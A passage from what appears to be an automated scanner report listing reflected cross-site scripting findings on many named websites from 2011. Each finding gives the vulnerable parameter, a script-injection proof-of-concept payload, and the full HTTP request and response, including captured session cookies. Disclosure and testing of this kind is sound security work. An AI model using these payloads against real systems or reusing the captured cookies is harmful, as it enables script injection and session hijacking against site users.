GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161da786'-alert(1)-'98c2520a2a5&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 670 Date: Sat, 26 Mar 2011 01:37:41 GMT Vary: Accept-Encoding Expires: Sat, 26 Mar 2011 01:37:41 GMT Cache-Control: private, x-gzip-ok=""
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 48579<script>alert(1)</script>8f27a3ba150 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=225976848579<script>alert(1)</script>8f27a3ba150&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:55 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2507
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "225976848579<script>alert(1)</script>8f27a3ba150"
The value of the placementId request parameter is copied into an HTML comment. The payload 70de1--><script>alert(1)</script>17479fecbed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=151562570de1--><script>alert(1)</script>17479fecbed&pid=2259768&ps=-1&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:53 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3400 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "151562570de1--><script>alert(1)</script>17479fecbed" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 87ebb--><script>alert(1)</script>fd77cc4c5e6 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=1515622&placementId=1515625&pid=2259768&ps=-187ebb--><script>alert(1)</script>fd77cc4c5e6&zw=580&zh=90&url=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&v=5&dct=Geraldine%20Ferraro%20Dead%3A%20First%20Female%20Vice%20Presidential%20Candidate%20Dies%20At%2075&metakw=geraldine,ferraro,dead%3A,first,female,vice,presidential,candidate,dies,at,75,politics HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TID=16lsqii1n1a3cr; TData=99999%7C61674%7C60489%7C60740%7C60490%7C56262%7C61576%7C60493%7C50963%7C60491%7C60515%7C50455%7C60514%7C53656%7C56830%7C52615%7C60546%7C56918%7C60500%7C56920%7C56930%7C56555%7C53435%7C51133%7C56917%7C56780%7C56500%7C52611%7C54463%7C56969%7C56835%7C54938%7C56761%7C56768%7C54173%7C53603_Wed%2C%2023%20Mar%202011%2019%3A39%3A43%20GMT
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:59 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3839 Content-Type: text/plain
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-187ebb--><script>alert(1)</script>fd77cc4c5e6" -->
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee was submitted in the q parameter. This input was echoed as ca1a8<img src=a onerror=alert(1)>58aa3f015ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /qsonhs.aspx?FORM=ASAPIW&q=ca1a8<img%20src%3da%20onerror%3dalert(1)>58aa3f015ee HTTP/1.1 Host: api.bing.com Proxy-Connection: keep-alive Referer: http://www.bing.com/maps.default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O
Response
HTTP/1.1 200 OK Content-Length: 79 Content-Type: application/json; charset=utf-8 X-Akamai-TestID: 9a3fe25a47d543bab74c1bbffe2e1322 Date: Sat, 26 Mar 2011 01:03:07 GMT Connection: close
The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd650"><script>alert(1)</script>4a55cdcca00 was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=Scd650"><script>alert(1)</script>4a55cdcca00 HTTP/1.1 Host: ezsub.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload f5b59<script>alert(1)</script>e93d24ee706 was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586f5b59<script>alert(1)</script>e93d24ee706&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1 Host: ezsub.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252"> <META NAME="Generator" CONTENT=""> <TITLE>Web Ca ...[SNIP]... <BR> ERROR: Web Page is corrupted! Wrong PUBID=586F5B59<SCRIPT>ALERT(1)</SCRIPT>E93D24EE706.<BR> ...[SNIP]...
The value of the RDRID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87621"><script>alert(1)</script>5029ac893ef was submitted in the RDRID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=87621"><script>alert(1)</script>5029ac893ef&SBTYPE=QN&PGTP=S HTTP/1.1 Host: ezsub.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ccef"><script>alert(1)</script>0d1de7150bc was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN7ccef"><script>alert(1)</script>0d1de7150bc&PGTP=S HTTP/1.1 Host: ezsub.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2eca"><script>alert(1)</script>0294bf7bc9 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INETd2eca"><script>alert(1)</script>0294bf7bc9&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1 Host: ezsub.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 794cd<script>alert(1)</script>e16bfebfc40 was submitted in the jt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc794cd<script>alert(1)</script>e16bfebfc40&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S HTTP/1.1 Host: ezsub.net Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/subscription-services User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 147e7<script>alert(1)</script>0be166769ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.001764 Content-Length: 68 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 20:36:35 GMT Connection: close
Not Found: /k147e7<script>alert(1)</script>0be166769ba/uni0vle-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e468a<script>alert(1)</script>47bf0b2c2b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1301171827082-New%7C1364243827082%3B%20s_nrgvo%3DNew%7C1364243827091%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.001332 Content-Length: 68 Vary: Accept-Encoding Date: Sat, 26 Mar 2011 20:36:35 GMT Connection: close
Not Found: /k/uni0vle-e.csse468a<script>alert(1)</script>47bf0b2c2b0
5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i1.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4f35<img%20src%3da%20onerror%3dalert(1)>f86de5af1be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4f35<img src=a onerror=alert(1)>f86de5af1be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Content-Type: application/x-javascript ETag: 93c60764a7ce82b2ad6321ad9ce04f9c Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB36 Vary: Accept-Encoding Cache-Control: public, max-age=43200 Expires: Sat, 26 Mar 2011 13:41:44 GMT Date: Sat, 26 Mar 2011 01:41:44 GMT Content-Length: 12899 Connection: close
5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i3.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54008<img%20src%3da%20onerror%3dalert(1)>89def521705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54008<img src=a onerror=alert(1)>89def521705 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK ntCoent-Length: 12845 Content-Type: application/x-javascript ETag: 3a527f2cf9226449bb99733ecdd6b9ad Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB31 Content-Length: 12845 Cache-Control: public, max-age=43200 Expires: Sat, 26 Mar 2011 13:40:07 GMT Date: Sat, 26 Mar 2011 01:40:07 GMT Connection: close Vary: Accept-Encoding
5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://i4.services.social.microsoft.com
Path:
/search/Widgets/SearchBox.jss
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67fe9<img%20src%3da%20onerror%3dalert(1)>e5797209df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67fe9<img src=a onerror=alert(1)>e5797209df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK ntCoent-Length: 12898 Content-Type: application/x-javascript ETag: 4333d9fde5edd64c06ec0c3e90339f31 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB35 Content-Length: 12898 Cache-Control: public, max-age=43200 Expires: Sat, 26 Mar 2011 13:41:39 GMT Date: Sat, 26 Mar 2011 01:41:39 GMT Connection: close Vary: Accept-Encoding
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4445b'-alert(1)-'90d16fca36c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:38 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 565
The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f79c'-alert(1)-'99a5d4b72c7 was submitted in the ran parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:36:27 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 565
The value of the h request parameter is copied into an HTML comment. The payload 80609--><script>alert(1)</script>1ecec661735 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /shavlik/index.cfm?m=1009&pg=697&h=80609--><script>alert(1)</script>1ecec661735&hp=69 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 20:42:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 8770d<script>alert(1)</script>23979558cba was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shavlik/index.cfm?m=1009&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f90628770d<script>alert(1)</script>23979558cba&hp=69 HTTP/1.1 Host: learn.shavlik.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 20:42:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my-happyfeet.com
Path:
/cart.asp
Issue detail
